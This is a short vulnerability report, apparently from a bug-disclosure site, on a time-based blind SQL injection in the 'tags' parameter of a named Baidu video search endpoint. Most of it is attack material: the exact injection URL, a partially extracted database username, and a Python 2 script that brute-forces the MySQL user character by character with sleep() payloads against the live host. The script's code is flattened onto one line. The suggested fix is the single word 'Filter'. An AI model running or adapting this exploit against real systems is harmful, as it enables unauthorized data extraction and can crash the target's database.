MySQL injection of a sub-station in Baidu (with verification script)
MySQL injection of a sub-station in Baidu can cause DoS attacks. The verification script is attached.
Injection point:
http://tv.baidu.com/rest/2.0/ssport/searchVideo?pageno=0&tags=if(length(user())=20,sleep(1),0)
The tags parameter can be injected.
Guess user () and get:
Tvopen_w @ 10 .*
By the time you guessed 10, your MySQL Server had crashed and was no longer in depth.
#encoding=gbkimport httplibimport timeimport stringimport sysimport urllibheaders = { 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',}payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print '[%s]Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())user = ''for i in range(9,21): for payload in payloads: try: conn = httplib.HTTPConnection('tv.baidu.com', timeout=5) s = "if(ascii(mid(user(),%s,1))=%s,sleep(1),0)" % (i, ord(payload)) conn.request(method='GET', url='/rest/2.0/ssport/searchVideo?pageno=0&tags=' + s, headers = headers) conn.getresponse().read() conn.close() print '.', except Exception, e: user += payload sys.stdout.write('\r[In progress]' + user) sys.stdout.flush() breakprint '\n[Task done at %s]MySQL user is %s' % ( time.strftime('%H:%M:%S', time.localtime()), user)
Solution:
Filter